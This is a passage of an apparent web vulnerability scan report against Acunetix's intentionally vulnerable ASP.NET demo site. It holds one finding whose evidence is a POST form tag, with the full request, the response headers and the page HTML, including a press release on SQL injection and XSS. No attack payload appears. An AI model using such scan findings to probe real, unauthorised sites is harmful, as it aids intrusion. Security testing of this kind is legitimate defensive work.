AgICAgICAgICAgICAgICAgICAgICAgICAgICBNb3JlIGluZm9ybWF0aW9uIGFib3V0IGNyb3NzIHNpdGUgc2NyaXB0aW5nICZhbXA7IFNRTCAgICAgICAgICAgICAgICAgICAgICAgICAgICBpbmplY3Rpb24gYXQgb3VyIHdlYnNpdGUgc2VjdXJpdHkgaW5mbyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgYWxzbyBjaGVja3MgZm9yICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRoZSBmb2xsb3dpbmcgd2ViIGF0dGFja3M6PC9zdHJvbmc+PC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDx1bD4gPGxpPkNSTEYgaW5qZWN0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5Db2RlIGV4ZWN1dGlvbiBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RGlyZWN0b3J5IHRyYXZlcnNhbCBhdHRhY2tzPGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPC9saT48bGk+RmlsZSBpbmNsdXNpb24gYXR0YWNrczxiciAvPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDwvbGk+PGxpPiBJbnB1dCB2YWxpZGF0aW9uIGF0dGFja3M8YnIgLz4gICAgICAgICAgICAgICAgICAgICAgICAgICA8L2xpPjxsaT5BdXRoZW50aWNhdGlvbiBhdHRhY2tzLjwvbGk+IDwvdWw+ICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA+PHN0cm9uZz5BZHZhbmNlZCBwZW5ldHJhdGlvbiB0ZXN0aW5nIHRvb2xzPC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGFsc28gaW5jbHVkZXMgdG9vbHMgc3VjaCBhcyBhbiBIVFRQIGVkaXRvciAgICAgICAgICAgICAgICAgICAgICAgICAgICAmYW1wOyBIVFRQIHNuaWZmZXIgdG8gYWxsb3cgY3VzdG9taXphdGlvbiBvZiB3ZWIgdnVsbmVyYWJpbGl0eSAgICAgICAgICAgICAgICAgICAgICAgICAgICBjaGVja3MuIFVzaW5nIHRoZSBWdWxuZXJhYmlsaXR5IGVkaXRvciwgbmV3IGF0dGFja3MgICAgICAgICAgICAgICAgICAgICAgICAgICAgY2FuIGVhc2lseSBiZSBjcmVhdGVkLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPlByaWNpbmcgJmFtcDsgYXZhaWxhYmlsaXR5PC9zdHJvbmc+PGJyIC8+ICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV1ZTIGlzIGF2YWlsYWJsZSBhcyBhbiBlbnRlcnByaXNlIG9yIGFzIGEgY29uc3VsdGFudCAgICAgICAgICAgICAgICAgICAgICAgICAgICB2ZXJzaW9uLiBBIHN1YnNjcmlwdGlvbiBiYXNlZCBsaWNlbnNlIGNhbiBiZSBwdXJjaGFzZWQgICAgICAgICAgICAgICAgICAgICAgICAgICAgZm9yIGFzIGxpdHRsZSBhcyAkMzk1LCB3aGVyZWFzIGEgcGVycGV0dWFsIGxpY2Vuc2Ugc3RhcnRzICAgICAgICAgICAgICAgICAgICAgICAgICAgIGF0ICQyOTk1LiBGb3IgbW9yZSBpbmZvcm1hdGlvbiB2aXNpdCBvdXIgcHJpY2luZyBwYWdlLjwvcD4gICAgICAgICAgICAgICAgICAgICAgICAgICA8cD48c3Ryb25nPkFib3V0IEFjdW5ldGl4PC9zdHJvbmc+PC9wPiAgICAgPHA+VXNlci1mcmllbmRseSBhbmQgY29tcGV0aXRpdmVseSBwcmljZWQsIEFjdW5ldGl4IGxlYWRzIHRoZSBtYXJrZXQgaW4gYXV0b21hdGljIHdlYiBzZWN1cml0eSB0ZXN0aW5nIHRlY2hub2xvZ3kuIEl0cyBpbmR1c3RyeS1sZWFkaW5nIGNyYXdsZXIgZnVsbHkgc3VwcG9ydHMgSFRNTDUsIEphdmFTY3JpcHQsIGFuZCBBSkFYLWhlYXZ5IHdlYnNpdGVzLCBlbmFibGluZyB0aGUgYXVkaXRpbmcgb2YgY29tcGxleCwgYXV0aGVudGljYXRlZCBhcHBsaWNhdGlvbnMuIEFjdW5ldGl4IHByb3ZpZGVzIHRoZSBvbmx5IHRlY2hub2xvZ3kgb24gdGhlIG1hcmtldCB0aGF0IGNhbiBhdXRvbWF0aWNhbGx5IGRldGVjdCBvdXQtb2YtYmFuZCB2dWxuZXJhYmlsaXRpZXMgYW5kIGlzIGF2YWlsYWJsZSBib3RoIGFzIGFuIG9ubGluZSBhbmQgb24tcHJlbWlzZXMgc29sdXRpb24uIEFjdW5ldGl4IGFsc28gaW5jbHVkZXMgaW50ZWdyYXRlZCB2dWxuZXJhYmlsaXR5IG1hbmFnZW1lbnQgZmVhdHVyZXMgdG8gZXh0ZW5kIHRoZSBlbnRlcnByaXNlJnJzcXVvO3MgYWJpbGl0eSB0byBjb21wcmVoZW5zaXZlbHkgbWFuYWdlLCBwcmlvcml0aXplLCBhbmQgY29udHJvbCB2dWxuZXJhYmlsaXR5IHRocmVhdHMgJm5kYXNoOyBvcmRlcmVkIGJ5IGJ1c2luZXNzIGNyaXRpY2FsaXR5LjwvcD5kAgkPDxYEHgRUZXh0BRJSZWFkIHVzZXIgY29tbWVudHMeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTJkZAILDxYCHgNzcmNkZGQMFEFD4s6E4+L8NgEI5fU11kxKVg==" /> </div> <script type="text/javascript"> //<![CDATA[ var theForm = document.forms['Form1']; if (!theForm) { theForm = document.Form1; } function __doPostBack(eventTarget, eventArgument) { if (!theForm.onsubmit \|\| (theForm.onsubmit() != false)) { theForm.__EVENTTARGET.value = eventTarget; theForm.__EVENTARGUMENT.value = eventArgument; theForm.submit(); } } //]]> </script> <div> <input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="532053C5" /> <input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwKsmpfVDAL+kPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK+b8FAor5vwUCivnT2QkCivnT2QkCivnH/AICivnH/AICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P/xAkCv5P/xAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBMM7CCcDz0WSHUDA7sLxpWzaC0J1" /> </div> <TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD> <TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640" height="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD> </TR> </TABLE> <TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0"> <TR> <TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A> <A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="MainMenu1_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="MainMenu1_lnkSignup" class="menu" name="lnkSignup"> signup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A> <A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A> </TD> <td class="MenuBar" align="right" width="50px"> <A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A> </td> </TR> </TABLE> <TABLE id="Table1" cellSpacing="0" cellPadding="10" width="790" align="center" border="0"> <TR> <TD vAlign="top"> <DIV id="divNewsDate" class="NewsDate">posted by <strong>admin </strong>11/8/2005 11:35:22 AM</DIV> <DIV id="divNewsTitle" class="NewsTitle">Web attacks - can your web applications withstand the force?</DIV> <DIV id="divNewsLong" class="NewsLong"><p><strong>Acunetix combats rise in web attacks with Acunetix Web Vulnerability Scanner 2 </strong></p> <p>21 July 2005 - <strong>Start-up company Acunetix released Acunetix Web Vulnerability Scanner: a tool to automatically audit website security. Acunetix Web Vulnerability Scanner 2 crawls an entire website, launches popular web attacks (SQL Injection etc.) and identifies vulnerabilities that need to be fixed.</strong> </p> <p><strong>Securing your website should be your number one concern</strong><br /> Hackers are concentrating their efforts on web-based applications - 75% of cyber attacks are done at the web application level, a Gartner Group study has revealed. Web applications are accessible 24 hours a day, 7 days a week and control valuable data such as customer information, transaction information and even proprietary corporate data.</p> <p><strong>500,000 customer credit card numbers obtained via a web attack</strong><br /> Well-known sites that were open to web application attacks include fashion label Guess and pet supply retailer PetCo.com who were notoriously found to be vulnerable to the SQL injection vulnerability (June 2003). This resulted in PetCo leaving as many as 500,000 credit card numbers open to anyone able to construct this specially-crafted URL.</p> <p><strong>Firewalls, SSL and locked-down servers are futile against web application hacking</strong><br /> Any defense at network security level will provide no protection against web application attacks since they are launched on port 80 - which has to remain open. In addition, web applications (customer areas, shopping carts etc.) are often tailor-made, invariably tested less than off-the-shelf software and are therefore more susceptible to attack.</p> <p>"Companies have implemented network-level security, however they fail to audit and secure their web applications. These applications have access to sensitive data and are a hacker's prime target," said Nick Galea, CEO of Acunetix. "Auditing one's web apps should be the number one security concern."</p> <p><strong>The need for an automated web application vulnerability scanner</strong><br /> Manually auditing a web application for vulnerabilities to SQL injection, cross site scripting and other web attacks is virtually impossible. With Acunetix Web Vulnerability Scanner the process of auditing web applications such as shopping carts and forms, can be easily automated. What's more, the security checks can easily be re-launched for each application update.</p> <p><strong>How Acunetix Web Vulnerability Scanner works</strong><br /> Acunetix WVS first crawls the whole website, analyzes in-depth each file it finds, and displays the entire website structure. After this discovery stage, it performs an automatic audit for common security vulnerabilities.</p> <p><strong>Automatically detects SQL injection, cross site scripting and other web vulnerabilities</strong><br /> SQL injection is a hacking technique which modifies SQL commands in order to gain access to data in the database. Cross site scripting attacks allow a hacker to execute a malicious script on your visitors' browser. Acunetix Web Vulnerability Scanner can check if your web application is vulnerable to both of these attacks. More information about cross site scripting & SQL injection at our website security info page.</p> <p><strong>Acunetix Web Vulnerability Scanner also checks for the following web attacks:</strong></p> <ul> <li>CRLF injection attacks<br /> </li><li>Code execution attacks<br /> </li><li>Directory traversal attacks<br /> </li><li>File inclusion attacks<br /> </li><li> Input validation attacks<br /> </li><li>Authentication attacks.</li> </ul> <p><strong>Advanced penetration testing tools</strong><br /> Acunetix WVS also includes tools such as an HTTP editor & HTTP sniffer to allow customization of web vulnerability checks. Using the Vulnerability editor, new attacks can easily be created.</p> <p><strong>Pricing & availability</strong><br /> Acunetix WVS is available as an enterprise or as a consultant version. A subscription based license can be purchased for as little as $395, whereas a perpetual license starts at $2995. For more information visit our pricing page.</p> <p><strong>About Acunetix</strong></p> <p>User-friendly and competitively priced, Acunetix leads the market in automatic web security testing technology. Its industry-leading crawler fully supports HTML5, JavaScript, and AJAX-heavy websites, enabling the auditing of complex, authenticated applications. Acunetix provides the only technology on the market that can automatically detect out-of-band vulnerabilities and is available both as an online and on-premises solution. Acunetix also includes integrated vulnerability management features to extend the enterprise’s ability to comprehensively manage, prioritize, and control vulnerability threats – ordered by business criticality.</p></DIV> <TABLE id="Table2" cellSpacing="0" cellPadding="0" width="500" border="0"> <TR> <TD vAlign="bottom"><IMG src="images/comment-before.gif"></TD> </TR> <TR> <TD class="Comment" vAlign="middle"> <a id="hlComments" href="Comments.aspx?id=2">Read user comments</a></TD> </TR> <TR> <TD vAlign="top"><IMG src="images/comment-after.gif"></TD> </TR> </TABLE> <center> <iframe id="adsFrame" width="200" height="110" style="BORDER-RIGHT: lemonchiffon 1px solid; BORDER-TOP: lemonchiffon 1px solid; BORDER-LEFT: lemonchiffon 1px solid; BORDER-BOTTOM: lemonchiffon 1px solid" frameBorder="no" scrolling="no"></iframe> </center> </TD> <TD vAlign="top" width="200" colSpan="2"> <table id="RightPanel1_Calendar" class="Calendar" cellspacing="0" cellpadding="1" title="Calendar" border="0" style="background-color:#E6DCCF;border-width:1px;border-style:Solid;font-size:X-Small;border-collapse:collapse;"> <tr><td colspan="7" style="background-color:#E6B873;"><table class="Calendar" cellspacing="0" border="0" style="font-size:X-Small;font-weight:bold;width:100%;border-collapse:collapse;"> <tr><td style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8340')" style="color:Black" title="Go to the previous month"><</a></td><td align="center" style="width:70%;">December 2022</td><td align="right" style="width:15%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','V8401')" style="color:Black" title="Go to the next month">></a></td></tr> </table></td></tr><tr><th align="center" abbr="Sunday" scope="col">Sun</th><th align="center" abbr="Monday" scope="col">Mon</th><th align="center" abbr="Tuesday" scope="col">Tue</th><th align="center" abbr="Wednesday" scope="col">Wed</th><th align="center" abbr="Thursday" scope="col">Thu</th><th align="center" abbr="Friday" scope="col">Fri</th><th align="center" abbr="Saturday" scope="col">Sat</th></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8366')" style="color:Black" title="November 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8367')" style="color:Black" title="November 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8368')" style="color:Black" title="November 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8369')" style="color:Black" title="November 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8370')" style="color:Black" title="December 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8371')" style="color:Black" title="December 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8372')" style="color:Black" title="December 03">3</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8373')" style="color:Black" title="December 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8374')" style="color:Black" title="December 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8375')" style="color:Black" title="December 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8376')" style="color:Black" title="December 07">7</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8377')" style="color:Black" title="December 08">8</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8378')" style="color:Black" title="December 09">9</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8379')" style="color:Black" title="December 10">10</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8380')" style="color:Black" title="December 11">11</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8381')" style="color:Black" title="December 12">12</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8382')" style="color:Black" title="December 13">13</a></td><td align="center" style="border-color:#806640;width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8383')" style="color:Black" title="December 14">14</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8384')" style="color:Black" title="December 15">15</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8385')" style="color:Black" title="December 16">16</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8386')" style="color:Black" title="December 17">17</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8387')" style="color:Black" title="December 18">18</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8388')" style="color:Black" title="December 19">19</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8389')" style="color:Black" title="December 20">20</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8390')" style="color:Black" title="December 21">21</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8391')" style="color:Black" title="December 22">22</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8392')" style="color:Black" title="December 23">23</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8393')" style="color:Black" title="December 24">24</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8394')" style="color:Black" title="December 25">25</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8395')" style="color:Black" title="December 26">26</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8396')" style="color:Black" title="December 27">27</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8397')" style="color:Black" title="December 28">28</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8398')" style="color:Black" title="December 29">29</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8399')" style="color:Black" title="December 30">30</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8400')" style="color:Black" title="December 31">31</a></td></tr><tr><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8401')" style="color:Black" title="January 01">1</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8402')" style="color:Black" title="January 02">2</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8403')" style="color:Black" title="January 03">3</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8404')" style="color:Black" title="January 04">4</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8405')" style="color:Black" title="January 05">5</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8406')" style="color:Black" title="January 06">6</a></td><td align="center" style="width:14%;"><a href="javascript:__doPostBack('RightPanel1$Calendar','8407')" style="color:Black" title="January 07">7</a></td></tr> </table><BR> <a href="rssFeed.aspx">Get RSS feed</a> </TD> </TR> <TR> <TD colSpan="3"></TD> </TR> </TABLE> </form> </body> <div style="background-color:lightgray;width:40%;margin:auto;left:30%;position:fixed;bottom:2px;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a blog. This is a test site for Acunetix. It is vulnerable to SQL Injections, Cross-site Scripting (XSS), and more. It was built using ASP.NET and it shows how bad programming leads to vulnerabilities. Do not visit the links in the comments. They are posted by malicious parties who are trying to exploit this site to their advantage. Comments are purged daily.</p> </div> </HTML>
URL	http://testaspnet.vulnweb.com/ReadNews.aspx?id=3
Method	POST
Parameter
Attack
Evidence	<form name="Form1" method="post" action="ReadNews.aspx?id=3" id="Form1">
Show / hide Request and Response
Request Header - size: 421 bytes.	POST http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 HTTP/1.1 Host: testaspnet.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; x64; rv:105.0esr) Gecko/20010101 Firefox/105.0esr Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testaspnet.vulnweb.com/ReadNews.aspx?id=3 Content-Length: 3707 Cookie: ASP.NET_SessionId=3qnlyw45qx3ugzagkbwuyse5
Request Body - size: 3,707 bytes.	__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTM1MjIzMjU2OQ9kFgICAQ9kFgwCAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkAgMPFgIfAQVJcG9zdGVkIGJ5IDxzdHJvbmc%2BYWRtaW4gICAgICAgICAgICAgICAgICAgIDwvc3Ryb25nPjExLzgvMjAwNSAxMTozNzozNSBBTWQCBQ8WAh8BBTFBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyIGJldGEgcmVsZWFzZWQhZAIHDxYCHwEFnA48cD5EdXJpbmcgdGhlIGJldGEgcGhhc2UsIGJ1aWxkcyBhcmUgcmVsZWFzZWQgZnJlcXVlbnRseSwgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhlcmVmb3JlIGl0IGlzIG5vdCByZWNvbW1lbmRlZCB0aGF0IHRoZSBzYW1lIGJldGEgdmVyc2lvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICBpcyB1c2VkIGZvciBtb3JlIHRoYW4gMzAgZGF5cy4gVG8gYmV0YS10ZXN0IGJleW9uZCAzMCAgICAgICAgICAgICAgICAgICAgICAgICAgICBkYXlzLCB1c2VycyBzaG91bGQgaW5zdGFsbCB0aGUgbGF0ZXN0IGJldGEgdmVyc2lvbiBvciwgICAgICAgICAgICAgICAgICAgICAgICAgICAgaWYgYXZhaWxhYmxlLCB1c2UgdGhlIHJlbGVhc2UgdmVyc2lvbi48L3A%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgPHA%2BPHN0cm9uZz5BYm91dCBBY3VuZXRpeCBXZWIgVnVsbmVyYWJpbGl0eSBTY2FubmVyPC9zdHJvbmc%2BPGJyIC8%2BICAgICAgICAgICAgICAgICAgICAgICAgICAgQWN1bmV0aXggV2ViIFZ1bG5lcmFiaWxpdHkgU2Nhbm5lciwgYSB1bmlxdWUgd2ViIGFwcGxpY2F0aW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgIHNjYW5uaW5nIHByb2R1Y3QgdGhhdCBtYWtlcyBzZWN1cmluZyBvbmUmcnNxdW87cyB3ZWJzaXRlICAgICAgICAgICAgICAgICAgICAgICAgICAgIGVhc2llciB0aGFuIGV2ZXIuIEFjdW5ldGl4IFdlYiBWdWxuZXJhYmlsaXR5IFNjYW5uZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaXMgYW4gYXV0b21hdGVkIHdlYiBhcHBsaWNhdGlvbiBzZWN1cml0eSB0ZXN0aW5nIHRvb2wgICAgICAgICAgICAgICAgICAgICAgICAgICAgdGhhdCBjcmF3bHMgYW4gZW50aXJlIHdlYnNpdGUgYW5kIGF0dGFja3MgaXQgc28gYXMgdG8gICAgICAgICAgICAgICAgICAgICAgICAgICAgaWRlbnRpZnkgcG90ZW50aWFsIHdlYWtuZXNzZXMgYmVmb3JlIGhhY2tlcnMgZG8uIEZ1cnRoZXIgICAgICAgICAgICAgICAgICAgICAgICAgICAgaW5mb3JtYXRpb24gaXMgYXZhaWxhYmxlIDxhIGhyZWY9aHR0cHM6Ly93d3cuYWN1bmV0aXguY29tL3Z1bG5lcmFiaWxpdHktc2Nhbm5lci8%2BaGVyZTwvYT4uPC9wPiAgICAgICAgICAgICAgICAgICAgICAgICAgIDxwPjxzdHJvbmc%2BQWJvdXQgQWN1bmV0aXg8L3N0cm9uZz48L3A%2BICAgICA8cD5Vc2VyLWZyaWVuZGx5IGFuZCBjb21wZXRpdGl2ZWx5IHByaWNlZCwgQWN1bmV0aXggbGVhZHMgdGhlIG1hcmtldCBpbiBhdXRvbWF0aWMgd2ViIHNlY3VyaXR5IHRlc3RpbmcgdGVjaG5vbG9neS4gSXRzIGluZHVzdHJ5LWxlYWRpbmcgY3Jhd2xlciBmdWxseSBzdXBwb3J0cyBIVE1MNSwgSmF2YVNjcmlwdCwgYW5kIEFKQVgtaGVhdnkgd2Vic2l0ZXMsIGVuYWJsaW5nIHRoZSBhdWRpdGluZyBvZiBjb21wbGV4LCBhdXRoZW50aWNhdGVkIGFwcGxpY2F0aW9ucy4gQWN1bmV0aXggcHJvdmlkZXMgdGhlIG9ubHkgdGVjaG5vbG9neSBvbiB0aGUgbWFya2V0IHRoYXQgY2FuIGF1dG9tYXRpY2FsbHkgZGV0ZWN0IG91dC1vZi1iYW5kIHZ1bG5lcmFiaWxpdGllcyBhbmQgaXMgYXZhaWxhYmxlIGJvdGggYXMgYW4gb25saW5lIGFuZCBvbi1wcmVtaXNlcyBzb2x1dGlvbi4gQWN1bmV0aXggYWxzbyBpbmNsdWRlcyBpbnRlZ3JhdGVkIHZ1bG5lcmFiaWxpdHkgbWFuYWdlbWVudCBmZWF0dXJlcyB0byBleHRlbmQgdGhlIGVudGVycHJpc2UmcnNxdW87cyBhYmlsaXR5IHRvIGNvbXByZWhlbnNpdmVseSBtYW5hZ2UsIHByaW9yaXRpemUsIGFuZCBjb250cm9sIHZ1bG5lcmFiaWxpdHkgdGhyZWF0cyAmbmRhc2g7IG9yZGVyZWQgYnkgYnVzaW5lc3MgY3JpdGljYWxpdHkuPC9wPmQCCQ8PFgIeC05hdmlnYXRlVXJsBRJDb21tZW50cy5hc3B4P2lkPTNkZAILDxYCHgNzcmNkZGTLo6VVRRdQACEbfKXC37R1sHPpoA%3D%3D&__VIEWSTATEGENERATOR=532053C5&__EVENTVALIDATION=%2FwEWVwK30rH2AgL%2BkPzjAQLQp5LlBAKx0tH6DwKx0tH6DwKx0sWRBwKx0sWRBwKx0rn5BQKx0rn5BQKx0q2cDQKx0q2cDQKK%2Bb8FAor5vwUCivnT2QkCivnT2QkCivnH%2FAICivnH%2FAICivn7kwoCivn7kwoCivnvtgMCivnvtgMCivmDzQwCivmDzQwCivm34AUCivm34AUCivmrhw0Civmrhw0Civmf7AsCivmf7AsCivmzgwMCivmzgwMCv5P%2FxAkCv5P%2FxAkCv5OTmwECv5OTmwECv5OHvgoCv5OHvgoCv5O71QMCv5O71QMCv5Ov6AwCv5Ov6AwCv5PDjAQCv5PDjAQCv5P3ow0Cv5P3ow0Cv5PrxgYCv5PrxgYCv5PfrwMCv5PfrwMCv5PzwgwCv5PzwgwCkLrd6w8CkLrd6w8CkLrxjgcCkLrxjgcCkLrlJQKQuuUlApC6mfgJApC6mfgJApC6jZ8BApC6jZ8BApC6obIKApC6obIKApC61dYDApC61dYDApC6ye0MApC6ye0MApC6vdUJApC6vdUJApC60ekCApC60ekCAtfZkJ4HAtfZkJ4HAtfZhDUC19mENQLX2bjICQLX2bjICQLX2azvAgLX2azvAgLX2cCDCgLX2cCDCgLX2fSmAwLX2fSmAwLX2ej9DALX2ej9DALX2ZyQBALX2ZyQBE1qoi%2FTB7mR4IysbuEg0lOgmHIs
Response Header - size: 222 bytes.	HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/8.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Wed, 14 Dec 2022 04:41:17 GMT Content-Length: 18011
Response Body - size: 18,011 bytes.	<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" > <HTML> <HEAD> <title>ReadNews</title> <meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR"> <meta content="C#" name="CODE_LANGUAGE"> <meta content="JavaScript" name="vs_defaultClientScript"> <meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema"> <LINK href="styles.css" type="text/css" rel="stylesheet"> </HEAD> <body> <form name="Form1" method="post" action="ReadNews.aspx?id=3" id="Form1"> <div> <input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" /> <input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" /> <input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" 